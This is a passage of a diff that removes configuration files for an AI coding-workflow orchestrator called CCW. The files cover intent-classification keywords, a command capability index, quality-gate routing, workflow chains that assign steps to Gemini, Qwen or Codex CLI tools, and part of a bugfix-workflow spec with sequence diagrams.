"high_findings": { "target": 0, "maximum": 3 }
|
||||
},
|
||||
"routing": {
|
||||
"critical == 0 AND high <= 3": "complete_or_optional_fix",
|
||||
"critical > 0": "mandatory_fix",
|
||||
"high > 3": "recommended_fix"
|
||||
}
|
||||
}
|
||||
},
|
||||
|
||||
"flow_decisions": {
|
||||
"_description": "根据产出完成度决定下一步",
|
||||
"patterns": {
|
||||
"plan_execute_test": {
|
||||
"sequence": ["plan", "execute", "test"],
|
||||
"on_test_fail": {
|
||||
"action": "extract_failures_and_fix",
|
||||
"max_iterations": 3,
|
||||
"fallback": "manual_intervention"
|
||||
}
|
||||
},
|
||||
"plan_execute_review": {
|
||||
"sequence": ["plan", "execute", "review"],
|
||||
"on_review_issues": {
|
||||
"action": "prioritize_and_fix",
|
||||
"auto_fix_threshold": "severity < high"
|
||||
}
|
||||
},
|
||||
"iterative_improvement": {
|
||||
"sequence": ["execute", "test", "fix"],
|
||||
"loop_until": "pass_rate >= 0.95 OR iterations >= 3",
|
||||
"on_loop_exit": "report_status"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,127 +0,0 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "1.0.0",
|
||||
"generated": "2026-01-03",
|
||||
"description": "CCW command capability index for intelligent workflow coordination"
|
||||
},
|
||||
"capabilities": {
|
||||
"explore": {
|
||||
"description": "Codebase exploration and context gathering",
|
||||
"commands": [
|
||||
{ "command": "/workflow:init", "weight": 1.0, "tags": ["project-setup", "context"] },
|
||||
{ "command": "/workflow:tools:gather", "weight": 0.9, "tags": ["context", "analysis"] },
|
||||
{ "command": "/memory:load", "weight": 0.8, "tags": ["context", "memory"] }
|
||||
],
|
||||
"agents": ["cli-explore-agent", "context-search-agent"]
|
||||
},
|
||||
"brainstorm": {
|
||||
"description": "Multi-perspective analysis and ideation",
|
||||
"commands": [
|
||||
{ "command": "/workflow:brainstorm:auto-parallel", "weight": 1.0, "tags": ["exploration", "multi-role"] },
|
||||
{ "command": "/workflow:brainstorm:artifacts", "weight": 0.9, "tags": ["clarification", "guidance"] },
|
||||
{ "command": "/workflow:brainstorm:synthesis", "weight": 0.8, "tags": ["consolidation", "refinement"] }
|
||||
],
|
||||
"roles": ["product-manager", "system-architect", "ux-expert", "data-architect", "api-designer"]
|
||||
},
|
||||
"plan": {
|
||||
"description": "Task planning and decomposition",
|
||||
"commands": [
|
||||
{ "command": "/workflow:lite-plan", "weight": 1.0, "complexity": "low-medium", "tags": ["fast", "interactive"] },
|
||||
{ "command": "/workflow:plan", "weight": 0.9, "complexity": "medium-high", "tags": ["comprehensive", "persistent"] },
|
||||
{ "command": "/workflow:tdd-plan", "weight": 0.7, "complexity": "medium-high", "tags": ["test-first", "quality"] },
|
||||
{ "command": "/task:create", "weight": 0.6, "tags": ["single-task", "manual"] },
|
||||
{ "command": "/task:breakdown", "weight": 0.5, "tags": ["decomposition", "subtasks"] }
|
||||
],
|
||||
"agents": ["cli-lite-planning-agent", "action-planning-agent"]
|
||||
},
|
||||
"verify": {
|
||||
"description": "Plan and quality verification",
|
||||
"commands": [
|
||||
{ "command": "/workflow:action-plan-verify", "weight": 1.0, "tags": ["plan-quality", "consistency"] },
|
||||
{ "command": "/workflow:tdd-verify", "weight": 0.8, "tags": ["tdd-compliance", "coverage"] }
|
||||
]
|
||||
},
|
||||
"execute": {
|
||||
"description": "Task execution and implementation",
|
||||
"commands": [
|
||||
{ "command": "/workflow:lite-execute", "weight": 1.0, "complexity": "low-medium", "tags": ["fast", "agent-or-cli"] },
|
||||
{ "command": "/workflow:execute", "weight": 0.9, "complexity": "medium-high", "tags": ["dag-parallel", "comprehensive"] },
|
||||
{ "command": "/task:execute", "weight": 0.7, "tags": ["single-task"] }
|
||||
],
|
||||
"agents": ["code-developer", "cli-execution-agent", "universal-executor"]
|
||||
},
|
||||
"bugfix": {
|
||||
"description": "Bug diagnosis and fixing",
|
||||
"commands": [
|
||||
{ "command": "/workflow:lite-fix", "weight": 1.0, "tags": ["diagnosis", "fix", "standard"] },
|
||||
{ "command": "/workflow:lite-fix --hotfix", "weight": 0.9, "tags": ["emergency", "production", "fast"] }
|
||||
],
|
||||
"agents": ["code-developer"]
|
||||
},
|
||||
"test": {
|
||||
"description": "Test generation and execution",
|
||||
"commands": [
|
||||
{ "command": "/workflow:test-gen", "weight": 1.0, "tags": ["post-implementation", "coverage"] },
|
||||
{ "command": "/workflow:test-fix-gen", "weight": 0.9, "tags": ["from-description", "flexible"] },
|
||||
{ "command": "/workflow:test-cycle-execute", "weight": 0.8, "tags": ["iterative", "fix-cycle"] }
|
||||
],
|
||||
"agents": ["test-fix-agent"]
|
||||
},
|
||||
"review": {
|
||||
"description": "Code review and quality analysis",
|
||||
"commands": [
|
||||
{ "command": "/workflow:review-session-cycle", "weight": 1.0, "tags": ["session-based", "comprehensive"] },
|
||||
{ "command": "/workflow:review-module-cycle", "weight": 0.9, "tags": ["module-based", "targeted"] },
|
||||
{ "command": "/workflow:review", "weight": 0.8, "tags": ["single-pass", "type-specific"] },
|
||||
{ "command": "/workflow:review-fix", "weight": 0.7, "tags": ["auto-fix", "findings"] }
|
||||
]
|
||||
},
|
||||
"issue": {
|
||||
"description": "Batch issue management",
|
||||
"commands": [
|
||||
{ "command": "/issue:new", "weight": 1.0, "tags": ["create", "import"] },
|
||||
{ "command": "/issue:discover", "weight": 0.9, "tags": ["find", "analyze"] },
|
||||
{ "command": "/issue:plan", "weight": 0.8, "tags": ["solutions", "planning"] },
|
||||
{ "command": "/issue:queue", "weight": 0.7, "tags": ["prioritize", "order"] },
|
||||
{ "command": "/issue:execute", "weight": 0.6, "tags": ["batch-execute", "dag"] }
|
||||
],
|
||||
"agents": ["issue-plan-agent", "issue-queue-agent"]
|
||||
},
|
||||
"ui-design": {
|
||||
"description": "UI design and prototyping",
|
||||
"commands": [
|
||||
{ "command": "/workflow:ui-design:explore-auto", "weight": 1.0, "tags": ["from-scratch", "variants"] },
|
||||
{ "command": "/workflow:ui-design:imitate-auto", "weight": 0.9, "tags": ["reference-based", "copy"] },
|
||||
{ "command": "/workflow:ui-design:design-sync", "weight": 0.7, "tags": ["sync", "finalize"] },
|
||||
{ "command": "/workflow:ui-design:generate", "weight": 0.6, "tags": ["assemble", "prototype"] }
|
||||
],
|
||||
"agents": ["ui-design-agent"]
|
||||
},
|
||||
"memory": {
|
||||
"description": "Documentation and knowledge management",
|
||||
"commands": [
|
||||
{ "command": "/memory:docs", "weight": 1.0, "tags": ["generate", "planning"] },
|
||||
{ "command": "/memory:update-related", "weight": 0.9, "tags": ["incremental", "git-based"] },
|
||||
{ "command": "/memory:update-full", "weight": 0.8, "tags": ["comprehensive", "all-modules"] },
|
||||
{ "command": "/memory:skill-memory", "weight": 0.7, "tags": ["package", "reusable"] }
|
||||
],
|
||||
"agents": ["doc-generator", "memory-bridge"]
|
||||
},
|
||||
"session": {
|
||||
"description": "Workflow session management",
|
||||
"commands": [
|
||||
{ "command": "/workflow:session:start", "weight": 1.0, "tags": ["init", "discover"] },
|
||||
{ "command": "/workflow:session:list", "weight": 0.9, "tags": ["view", "status"] },
|
||||
{ "command": "/workflow:session:resume", "weight": 0.8, "tags": ["continue", "restore"] },
|
||||
{ "command": "/workflow:session:complete", "weight": 0.7, "tags": ["finish", "archive"] }
|
||||
]
|
||||
},
|
||||
"debug": {
|
||||
"description": "Debugging and problem solving",
|
||||
"commands": [
|
||||
{ "command": "/workflow:debug", "weight": 1.0, "tags": ["hypothesis", "iterative"] },
|
||||
{ "command": "/workflow:clean", "weight": 0.6, "tags": ["cleanup", "artifacts"] }
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,136 +0,0 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "1.0.0",
|
||||
"description": "Externalized intent classification rules for CCW orchestrator"
|
||||
},
|
||||
"intent_patterns": {
|
||||
"bugfix": {
|
||||
"priority": 1,
|
||||
"description": "Bug修复意图",
|
||||
"variants": {
|
||||
"hotfix": {
|
||||
"patterns": ["hotfix", "urgent", "production", "critical", "emergency", "紧急", "生产环境", "线上"],
|
||||
"workflow": "lite-fix --hotfix"
|
||||
},
|
||||
"standard": {
|
||||
"patterns": ["fix", "bug", "error", "issue", "crash", "broken", "fail", "wrong", "incorrect", "修复", "错误", "崩溃", "失败"],
|
||||
"workflow": "lite-fix"
|
||||
}
|
||||
}
|
||||
},
|
||||
"issue_batch": {
|
||||
"priority": 2,
|
||||
"description": "批量Issue处理意图",
|
||||
"patterns": {
|
||||
"batch_keywords": ["issues", "issue", "batch", "queue", "多个", "批量", "一批"],
|
||||
"action_keywords": ["fix", "resolve", "处理", "解决", "修复"]
|
||||
},
|
||||
"require_both": true,
|
||||
"workflow": "issue:plan → issue:queue → issue:execute"
|
||||
},
|
||||
"exploration": {
|
||||
"priority": 3,
|
||||
"description": "探索/不确定意图",
|
||||
"patterns": ["不确定", "不知道", "explore", "研究", "分析一下", "怎么做", "what if", "should i", "探索", "可能", "或许", "建议"],
|
||||
"workflow": "brainstorm → plan → execute"
|
||||
},
|
||||
"ui_design": {
|
||||
"priority": 4,
|
||||
"description": "UI/设计意图",
|
||||
"patterns": ["ui", "界面", "design", "设计", "component", "组件", "style", "样式", "layout", "布局", "前端", "frontend", "页面"],
|
||||
"variants": {
|
||||
"imitate": {
|
||||
"triggers": ["参考", "模仿", "像", "类似", "reference", "like"],
|
||||
"workflow": "ui-design:imitate-auto → plan → execute"
|
||||
},
|
||||
"explore": {
|
||||
"triggers": [],
|
||||
"workflow": "ui-design:explore-auto → plan → execute"
|
||||
}
|
||||
}
|
||||
},
|
||||
"tdd": {
|
||||
"priority": 5,
|
||||
"description": "测试驱动开发意图",
|
||||
"patterns": ["tdd", "test-driven", "测试驱动", "先写测试", "red-green", "test first"],
|
||||
"workflow": "tdd-plan → execute → tdd-verify"
|
||||
},
|
||||
"review": {
|
||||
"priority": 6,
|
||||
"description": "代码审查意图",
|
||||
"patterns": ["review", "审查", "检查代码", "code review", "质量检查", "安全审查"],
|
||||
"workflow": "review-session-cycle → review-fix"
|
||||
},
|
||||
"documentation": {
|
||||
"priority": 7,
|
||||
"description": "文档生成意图",
|
||||
"patterns": ["文档", "documentation", "docs", "readme", "注释", "api doc", "说明"],
|
||||
"variants": {
|
||||
"incremental": {
|
||||
"triggers": ["更新", "增量", "相关"],
|
||||
"workflow": "memory:update-related"
|
||||
},
|
||||
"full": {
|
||||
"triggers": ["全部", "完整", "所有"],
|
||||
"workflow": "memory:docs → execute"
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"complexity_indicators": {
|
||||
"high": {
|
||||
"score_threshold": 4,
|
||||
"patterns": {
|
||||
"architecture": {
|
||||
"keywords": ["refactor", "重构", "migrate", "迁移", "architect", "架构", "system", "系统"],
|
||||
"weight": 2
|
||||
},
|
||||
"multi_module": {
|
||||
"keywords": ["multiple", "多个", "across", "跨", "all", "所有", "entire", "整个"],
|
||||
"weight": 2
|
||||
},
|
||||
"integration": {
|
||||
"keywords": ["integrate", "集成", "connect", "连接", "api", "database", "数据库"],
|
||||
"weight": 1
|
||||
},
|
||||
"quality": {
|
||||
"keywords": ["security", "安全", "performance", "性能", "scale", "扩展", "优化"],
|
||||
"weight": 1
|
||||
}
|
||||
},
|
||||
"workflow": "plan → verify → execute"
|
||||
},
|
||||
"medium": {
|
||||
"score_threshold": 2,
|
||||
"workflow": "lite-plan → lite-execute"
|
||||
},
|
||||
"low": {
|
||||
"score_threshold": 0,
|
||||
"workflow": "lite-plan → lite-execute"
|
||||
}
|
||||
},
|
||||
"cli_tool_triggers": {
|
||||
"gemini": {
|
||||
"explicit": ["用 gemini", "gemini 分析", "让 gemini", "用gemini"],
|
||||
"semantic": ["深度分析", "架构理解", "执行流追踪", "根因分析"]
|
||||
},
|
||||
"qwen": {
|
||||
"explicit": ["用 qwen", "qwen 评估", "让 qwen", "用qwen"],
|
||||
"semantic": ["第二视角", "对比验证", "模式识别"]
|
||||
},
|
||||
"codex": {
|
||||
"explicit": ["用 codex", "codex 实现", "让 codex", "用codex"],
|
||||
"semantic": ["自主完成", "批量修改", "自动实现"]
|
||||
}
|
||||
},
|
||||
"fallback_rules": {
|
||||
"no_match": {
|
||||
"default_workflow": "lite-plan → lite-execute",
|
||||
"use_complexity_assessment": true
|
||||
},
|
||||
"ambiguous": {
|
||||
"action": "ask_user",
|
||||
"message": "检测到多个可能意图,请确认工作流选择"
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,451 +0,0 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "1.1.0",
|
||||
"description": "Predefined workflow chains with CLI tool integration for CCW orchestration"
|
||||
},
|
||||
"cli_tools": {
|
||||
"_doc": "CLI工具是CCW的核心能力,在合适时机自动调用以获得:1)较少token获取大量上下文 2)引入不同模型视角 3)增强debug和规划能力",
|
||||
"gemini": {
|
||||
"strengths": ["超长上下文", "深度分析", "架构理解", "执行流追踪"],
|
||||
"triggers": ["分析", "理解", "设计", "架构", "评估", "诊断"],
|
||||
"mode": "analysis",
|
||||
"token_efficiency": "high",
|
||||
"use_when": [
|
||||
"需要理解大型代码库结构",
|
||||
"执行流追踪和数据流分析",
|
||||
"架构设计和技术方案评估",
|
||||
"复杂问题诊断(root cause analysis)"
|
||||
]
|
||||
},
|
||||
"qwen": {
|
||||
"strengths": ["超长上下文", "代码模式识别", "多维度分析"],
|
||||
"triggers": ["评估", "对比", "验证"],
|
||||
"mode": "analysis",
|
||||
"token_efficiency": "high",
|
||||
"use_when": [
|
||||
"Gemini 不可用时作为备选",
|
||||
"需要第二视角验证分析结果",
|
||||
"代码模式识别和重复检测"
|
||||
]
|
||||
},
|
||||
"codex": {
|
||||
"strengths": ["精确代码生成", "自主执行", "数学推理"],
|
||||
"triggers": ["实现", "重构", "修复", "生成", "测试"],
|
||||
"mode": "write",
|
||||
"token_efficiency": "medium",
|
||||
"use_when": [
|
||||
"需要自主完成多步骤代码修改",
|
||||
"复杂重构和迁移任务",
|
||||
"测试生成和修复循环"
|
||||
]
|
||||
}
|
||||
},
|
||||
"cli_injection_rules": {
|
||||
"_doc": "隐式规则:在特定条件下自动注入CLI调用",
|
||||
"context_gathering": {
|
||||
"trigger": "file_read >= 50k chars OR module_count >= 5",
|
||||
"inject": "gemini --mode analysis",
|
||||
"reason": "大量代码上下文使用CLI可节省主会话token"
|
||||
},
|
||||
"pre_planning_analysis": {
|
||||
"trigger": "complexity === 'high' OR intent === 'exploration'",
|
||||
"inject": "gemini --mode analysis",
|
||||
"reason": "复杂任务先用CLI分析获取多模型视角"
|
||||
},
|
||||
"debug_diagnosis": {
|
||||
"trigger": "intent === 'bugfix' AND root_cause_unclear",
|
||||
"inject": "gemini --mode analysis",
|
||||
"reason": "深度诊断利用Gemini的执行流追踪能力"
|
||||
},
|
||||
"code_review": {
|
||||
"trigger": "step === 'review'",
|
||||
"inject": "gemini --mode analysis",
|
||||
"reason": "代码审查用CLI减少token占用"
|
||||
},
|
||||
"implementation": {
|
||||
"trigger": "step === 'execute' AND task_count >= 3",
|
||||
"inject": "codex --mode write",
|
||||
"reason": "多任务执行用Codex自主完成"
|
||||
}
|
||||
},
|
||||
"chains": {
|
||||
"rapid": {
|
||||
"name": "Rapid Iteration",
|
||||
"description": "多模型协作分析 + 直接执行",
|
||||
"complexity": ["low", "medium"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:lite-plan",
|
||||
"optional": false,
|
||||
"auto_continue": true,
|
||||
"cli_hint": {
|
||||
"explore_phase": { "tool": "gemini", "mode": "analysis", "trigger": "needs_exploration" },
|
||||
"planning_phase": { "tool": "gemini", "mode": "analysis", "trigger": "complexity >= medium" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:lite-execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "user_selects_codex OR complexity >= medium" },
|
||||
"review": { "tool": "gemini", "mode": "analysis", "trigger": "user_selects_review" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 2,
|
||||
"estimated_time": "15-45 min"
|
||||
},
|
||||
"full": {
|
||||
"name": "Full Exploration",
|
||||
"description": "多模型深度分析 + 头脑风暴 + 规划 + 执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:brainstorm:auto-parallel",
|
||||
"optional": false,
|
||||
"confirm_before": true,
|
||||
"cli_hint": {
|
||||
"role_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:plan",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"context_gather": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"task_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
},
|
||||
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
|
||||
{
|
||||
"command": "/workflow:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "task_count >= 3" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 4,
|
||||
"estimated_time": "1-3 hours"
|
||||
},
|
||||
"coupled": {
|
||||
"name": "Coupled Planning",
|
||||
"description": "CLI深度分析 + 完整规划 + 验证 + 执行",
|
||||
"complexity": ["high"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:plan",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"pre_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "purpose": "架构理解和依赖分析" },
|
||||
"conflict_detection": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
},
|
||||
{ "command": "/workflow:action-plan-verify", "optional": false, "auto_continue": true },
|
||||
{
|
||||
"command": "/workflow:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "always", "purpose": "自主多任务执行" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:review",
|
||||
"optional": true,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"review": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 4,
|
||||
"estimated_time": "2-4 hours"
|
||||
},
|
||||
"bugfix": {
|
||||
"name": "Bug Fix",
|
||||
"description": "CLI诊断 + 智能修复",
|
||||
"complexity": ["low", "medium"],
|
||||
"variants": {
|
||||
"standard": {
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:lite-fix",
|
||||
"optional": false,
|
||||
"auto_continue": true,
|
||||
"cli_hint": {
|
||||
"diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "purpose": "根因分析和执行流追踪" },
|
||||
"fix": { "tool": "codex", "mode": "write", "trigger": "severity >= medium" }
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"hotfix": {
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:lite-fix --hotfix",
|
||||
"optional": false,
|
||||
"auto_continue": true,
|
||||
"cli_hint": {
|
||||
"quick_diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "timeout": "60s" }
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"total_steps": 1,
|
||||
"estimated_time": "10-30 min"
|
||||
},
|
||||
"issue": {
|
||||
"name": "Issue Batch",
|
||||
"description": "CLI批量分析 + 队列优化 + 并行执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/issue:plan",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"solution_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/issue:queue",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"conflict_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "issue_count >= 3" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/issue:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"batch_execution": { "tool": "codex", "mode": "write", "trigger": "always", "purpose": "DAG并行执行" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 3,
|
||||
"estimated_time": "1-4 hours"
|
||||
},
|
||||
"tdd": {
|
||||
"name": "Test-Driven Development",
|
||||
"description": "TDD规划 + 执行 + CLI验证",
|
||||
"complexity": ["medium", "high"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:tdd-plan",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"test_strategy": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"red_green_refactor": { "tool": "codex", "mode": "write", "trigger": "always" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:tdd-verify",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"coverage_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 3,
|
||||
"estimated_time": "1-3 hours"
|
||||
},
|
||||
"ui": {
|
||||
"name": "UI-First Development",
|
||||
"description": "UI设计 + 规划 + 执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"variants": {
|
||||
"explore": {
|
||||
"steps": [
|
||||
{ "command": "/workflow:ui-design:explore-auto", "optional": false, "auto_continue": false },
|
||||
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:plan", "optional": false, "auto_continue": false },
|
||||
{ "command": "/workflow:execute", "optional": false, "auto_continue": false }
|
||||
]
|
||||
},
|
||||
"imitate": {
|
||||
"steps": [
|
||||
{ "command": "/workflow:ui-design:imitate-auto", "optional": false, "auto_continue": false },
|
||||
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:plan", "optional": false, "auto_continue": false },
|
||||
{ "command": "/workflow:execute", "optional": false, "auto_continue": false }
|
||||
]
|
||||
}
|
||||
},
|
||||
"total_steps": 4,
|
||||
"estimated_time": "2-4 hours"
|
||||
},
|
||||
"review-fix": {
|
||||
"name": "Review and Fix",
|
||||
"description": "CLI多维审查 + 自动修复",
|
||||
"complexity": ["medium"],
|
||||
"steps": [
|
||||
{
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"multi_dimension_review": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
|
||||
}
|
||||
},
|
||||
{
|
||||
"command": "/workflow:review-fix",
|
||||
"optional": true,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"auto_fix": { "tool": "codex", "mode": "write", "trigger": "findings_count >= 3" }
|
||||
}
|
||||
}
|
||||
],
|
||||
"total_steps": 2,
|
||||
"estimated_time": "30-90 min"
|
||||
},
|
||||
"docs": {
|
||||
"name": "Documentation",
|
||||
"description": "CLI批量文档生成",
|
||||
"complexity": ["low", "medium"],
|
||||
"variants": {
|
||||
"incremental": {
|
||||
"steps": [
|
||||
{
|
||||
"command": "/memory:update-related",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"doc_generation": { "tool": "gemini", "mode": "write", "trigger": "module_count >= 5" }
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
"full": {
|
||||
"steps": [
|
||||
{ "command": "/memory:docs", "optional": false, "auto_continue": false },
|
||||
{
|
||||
"command": "/workflow:execute",
|
||||
"optional": false,
|
||||
"auto_continue": false,
|
||||
"cli_hint": {
|
||||
"batch_doc": { "tool": "gemini", "mode": "write", "trigger": "always" }
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"total_steps": 2,
|
||||
"estimated_time": "15-60 min"
|
||||
},
|
||||
"cli-analysis": {
|
||||
"name": "CLI Direct Analysis",
|
||||
"description": "直接CLI分析,获取多模型视角,节省主会话token",
|
||||
"complexity": ["low", "medium", "high"],
|
||||
"standalone": true,
|
||||
"steps": [
|
||||
{
|
||||
"command": "ccw cli",
|
||||
"tool": "gemini",
|
||||
"mode": "analysis",
|
||||
"optional": false,
|
||||
"auto_continue": false
|
||||
}
|
||||
],
|
||||
"use_cases": [
|
||||
"大型代码库快速理解",
|
||||
"执行流追踪和数据流分析",
|
||||
"架构评估和技术方案对比",
|
||||
"性能瓶颈诊断"
|
||||
],
|
||||
"total_steps": 1,
|
||||
"estimated_time": "5-15 min"
|
||||
},
|
||||
"cli-implement": {
|
||||
"name": "CLI Direct Implementation",
|
||||
"description": "直接Codex实现,自主完成多步骤任务",
|
||||
"complexity": ["medium", "high"],
|
||||
"standalone": true,
|
||||
"steps": [
|
||||
{
|
||||
"command": "ccw cli",
|
||||
"tool": "codex",
|
||||
"mode": "write",
|
||||
"optional": false,
|
||||
"auto_continue": false
|
||||
}
|
||||
],
|
||||
"use_cases": [
|
||||
"明确需求的功能实现",
|
||||
"代码重构和迁移",
|
||||
"测试生成",
|
||||
"批量代码修改"
|
||||
],
|
||||
"total_steps": 1,
|
||||
"estimated_time": "15-60 min"
|
||||
},
|
||||
"cli-debug": {
|
||||
"name": "CLI Debug Session",
|
||||
"description": "CLI调试会话,利用Gemini深度诊断能力",
|
||||
"complexity": ["medium", "high"],
|
||||
"standalone": true,
|
||||
"steps": [
|
||||
{
|
||||
"command": "ccw cli",
|
||||
"tool": "gemini",
|
||||
"mode": "analysis",
|
||||
"purpose": "hypothesis-driven debugging",
|
||||
"optional": false,
|
||||
"auto_continue": false
|
||||
}
|
||||
],
|
||||
"use_cases": [
|
||||
"复杂bug根因分析",
|
||||
"执行流异常追踪",
|
||||
"状态机错误诊断",
|
||||
"并发问题排查"
|
||||
],
|
||||
"total_steps": 1,
|
||||
"estimated_time": "10-30 min"
|
||||
}
|
||||
},
|
||||
"chain_selection_rules": {
|
||||
"intent_mapping": {
|
||||
"bugfix": ["bugfix"],
|
||||
"feature_simple": ["rapid"],
|
||||
"feature_unclear": ["full"],
|
||||
"feature_complex": ["coupled"],
|
||||
"issue_batch": ["issue"],
|
||||
"test_driven": ["tdd"],
|
||||
"ui_design": ["ui"],
|
||||
"code_review": ["review-fix"],
|
||||
"documentation": ["docs"],
|
||||
"analysis_only": ["cli-analysis"],
|
||||
"implement_only": ["cli-implement"],
|
||||
"debug": ["cli-debug", "bugfix"]
|
||||
},
|
||||
"complexity_fallback": {
|
||||
"low": "rapid",
|
||||
"medium": "coupled",
|
||||
"high": "full"
|
||||
},
|
||||
"cli_preference_rules": {
|
||||
"_doc": "用户语义触发CLI工具选择",
|
||||
"gemini_triggers": ["用 gemini", "gemini 分析", "让 gemini", "深度分析", "架构理解"],
|
||||
"qwen_triggers": ["用 qwen", "qwen 评估", "让 qwen", "第二视角"],
|
||||
"codex_triggers": ["用 codex", "codex 实现", "让 codex", "自主完成", "批量修改"]
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,218 +0,0 @@
|
||||
# Action: Bugfix Workflow
|
||||
|
||||
缺陷修复工作流:智能诊断 + 影响评估 + 修复
|
||||
|
||||
## Pattern
|
||||
|
||||
```
|
||||
lite-fix [--hotfix]
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- Keywords: "fix", "bug", "error", "crash", "broken", "fail", "修复", "报错"
|
||||
- Problem symptoms described
|
||||
- Error messages present
|
||||
|
||||
## Execution Flow
|
||||
|
||||
### Standard Mode
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant LF as lite-fix
|
||||
participant CLI as CLI Tools
|
||||
|
||||
U->>O: Bug description
|
||||
O->>O: Classify: bugfix (standard)
|
||||
O->>LF: /workflow:lite-fix "bug"
|
||||
|
||||
Note over LF: Phase 1: Diagnosis
|
||||
LF->>CLI: Root cause analysis (Gemini)
|
||||
CLI-->>LF: diagnosis.json
|
||||
|
||||
Note over LF: Phase 2: Impact Assessment
|
||||
LF->>LF: Risk scoring (0-10)
|
||||
LF->>LF: Severity classification
|
||||
LF-->>U: Impact report
|
||||
|
||||
Note over LF: Phase 3: Fix Strategy
|
||||
LF->>LF: Generate fix options
|
||||
LF-->>U: Present strategies
|
||||
U->>LF: Select strategy
|
||||
|
||||
Note over LF: Phase 4: Verification Plan
|
||||
LF->>LF: Generate test plan
|
||||
LF-->>U: Verification approach
|
||||
|
||||
Note over LF: Phase 5: Confirmation
|
||||
LF->>U: Execution method?
|
||||
U->>LF: Confirm
|
||||
|
||||
Note over LF: Phase 6: Execute
|
||||
LF->>CLI: Execute fix (Agent/Codex)
|
||||
CLI-->>LF: Results
|
||||
LF-->>U: Fix complete
|
||||
```
|
||||
|
||||
### Hotfix Mode
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant LF as lite-fix
|
||||
participant CLI as CLI Tools
|
||||
|
||||
U->>O: Urgent bug + "hotfix"
|
||||
O->>O: Classify: bugfix (hotfix)
|
